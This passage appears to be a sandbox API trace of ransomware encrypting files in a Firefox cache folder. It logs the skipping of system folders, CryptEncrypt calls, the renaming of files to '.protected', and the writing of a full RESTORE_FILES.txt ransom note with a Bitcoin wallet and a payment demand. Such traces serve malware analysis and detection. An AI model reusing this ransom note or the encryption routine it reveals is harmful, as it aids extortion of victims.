lpString2="Windows") returned -1 [0086.089] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.089] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.089] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.089] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.089] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\..") returned 100 [0086.089] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.089] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.089] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.089] lstrcmpiW (lpString1="0B", lpString2="Windows") returned -1 [0086.089] lstrcmpiW (lpString1="0B", lpString2="Program Files") returned -1 [0086.089] lstrcmpiW (lpString1="0B", lpString2="Program Files (x86)") returned -1 [0086.089] lstrcmpiW (lpString1="0B", lpString2="$Recycle.bin") returned 1 [0086.089] lstrcmpiW (lpString1="0B", lpString2="System Volume Information") returned -1 [0086.089] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B") returned 100 [0086.089] lstrcmpW (lpString1="0B", lpString2=".") returned 1 [0086.089] lstrcmpW (lpString1="0B", lpString2="..") returned 1 [0086.090] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\*") returned 102 [0086.090] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0086.090] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.090] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.090] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.090] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.090] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.090] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\.") returned 102 [0086.090] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.090] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.091] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.091] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.091] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.091] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.091] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.091] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\..") returned 103 [0086.091] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.091] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.091] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.091] lstrcmpiW (lpString1="FCBF5d01", lpString2="Windows") returned -1 [0086.091] lstrcmpiW (lpString1="FCBF5d01", lpString2="Program Files") returned -1 [0086.091] lstrcmpiW (lpString1="FCBF5d01", lpString2="Program Files (x86)") returned -1 [0086.091] lstrcmpiW (lpString1="FCBF5d01", lpString2="$Recycle.bin") returned 1 [0086.091] lstrcmpiW (lpString1="FCBF5d01", lpString2="System Volume Information") returned -1 [0086.091] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\FCBF5d01") returned 109 [0086.091] StrStrIW (lpFirst="FCBF5d01", lpSrch=".protected") returned 0x0 [0086.091] lstrcmpW (lpString1="FCBF5d01", lpString2="RESTORE_FILES.txt") returned -1 [0086.091] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0086.091] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0086.091] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\FCBF5d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\0b\\fcbf5d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0086.092] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\FCBF5d01") returned 109 [0086.092] StrStrW (lpFirst="FCBF5d01", lpSrch=".txt") returned 0x0 [0086.092] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\FCBF5d01") returned 109 [0086.092] StrStrW (lpFirst="FCBF5d01", lpSrch=".rar") returned 0x0 [0086.092] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\FCBF5d01") returned 109 [0086.092] StrStrW (lpFirst="FCBF5d01", lpSrch=".zip") returned 0x0 [0086.092] ReadFile (in: hFile=0x160, lpBuffer=0xcf0090, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.102] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.102] WriteFile (in: hFile=0x160, lpBuffer=0xcf0090*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.102] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.102] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0086.111] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0086.112] CloseHandle (hObject=0x160) returned 1 [0086.112] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\FCBF5d01.protected") returned 119 [0086.112] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\FCBF5d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\0b\\fcbf5d01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\FCBF5d01.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\0b\\fcbf5d01.protected")) returned 1 [0086.113] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0086.113] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0086.113] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\RESTORE_FILES.txt") returned 118 [0086.113] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\0b\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0086.114] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.114] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0086.114] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.114] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.114] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.115] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0086.115] CloseHandle (hObject=0x15c) returned 1 [0086.115] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.115] lstrcmpiW (lpString1="C2", lpString2="Windows") returned -1 [0086.115] lstrcmpiW (lpString1="C2", lpString2="Program Files") returned -1 [0086.115] lstrcmpiW (lpString1="C2", lpString2="Program Files (x86)") returned -1 [0086.115] lstrcmpiW (lpString1="C2", lpString2="$Recycle.bin") returned 1 [0086.115] lstrcmpiW (lpString1="C2", lpString2="System Volume Information") returned -1 [0086.115] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2") returned 100 [0086.115] lstrcmpW (lpString1="C2", lpString2=".") returned 1 [0086.115] lstrcmpW (lpString1="C2", lpString2="..") returned 1 [0086.115] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\*") returned 102 [0086.115] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0086.116] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.116] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.116] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.116] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.116] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.116] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\.") returned 102 [0086.116] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.116] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.116] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.116] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.116] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.116] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.116] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.116] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\..") returned 103 [0086.116] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.116] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.116] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.116] lstrcmpiW (lpString1="0B619d01", lpString2="Windows") returned -1 [0086.116] lstrcmpiW (lpString1="0B619d01", lpString2="Program Files") returned -1 [0086.116] lstrcmpiW (lpString1="0B619d01", lpString2="Program Files (x86)") returned -1 [0086.116] lstrcmpiW (lpString1="0B619d01", lpString2="$Recycle.bin") returned 1 [0086.116] lstrcmpiW (lpString1="0B619d01", lpString2="System Volume Information") returned -1 [0086.116] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\0B619d01") returned 109 [0086.116] StrStrIW (lpFirst="0B619d01", lpSrch=".protected") returned 0x0 [0086.116] lstrcmpW (lpString1="0B619d01", lpString2="RESTORE_FILES.txt") returned -1 [0086.117] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0086.117] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0086.117] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\0B619d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\c2\\0b619d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0086.117] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\0B619d01") returned 109 [0086.117] StrStrW (lpFirst="0B619d01", lpSrch=".txt") returned 0x0 [0086.117] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\0B619d01") returned 109 [0086.117] StrStrW (lpFirst="0B619d01", lpSrch=".rar") returned 0x0 [0086.117] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\0B619d01") returned 109 [0086.117] StrStrW (lpFirst="0B619d01", lpSrch=".zip") returned 0x0 [0086.117] ReadFile (in: hFile=0x160, lpBuffer=0xcf0090, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.158] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.158] WriteFile (in: hFile=0x160, lpBuffer=0xcf0090*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.158] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.159] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0086.159] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0086.159] CloseHandle (hObject=0x160) returned 1 [0086.159] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\0B619d01.protected") returned 119 [0086.159] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\0B619d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\c2\\0b619d01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\0B619d01.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\c2\\0b619d01.protected")) returned 1 [0086.160] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0086.160] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0086.160] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\RESTORE_FILES.txt") returned 118 [0086.160] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\c2\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0086.160] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.160] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0086.161] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.161] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.161] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.161] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0086.161] CloseHandle (hObject=0x15c) returned 1 [0086.161] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.161] lstrcmpiW (lpString1="F6", lpString2="Windows") returned -1 [0086.161] lstrcmpiW (lpString1="F6", lpString2="Program Files") returned -1 [0086.161] lstrcmpiW (lpString1="F6", lpString2="Program Files (x86)") returned -1 [0086.161] lstrcmpiW (lpString1="F6", lpString2="$Recycle.bin") returned 1 [0086.161] lstrcmpiW (lpString1="F6", lpString2="System Volume Information") returned -1 [0086.161] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6") returned 100 [0086.161] lstrcmpW (lpString1="F6", lpString2=".") returned 1 [0086.161] lstrcmpW (lpString1="F6", lpString2="..") returned 1 [0086.161] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\*") returned 102 [0086.161] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0086.162] lstrcmpiW 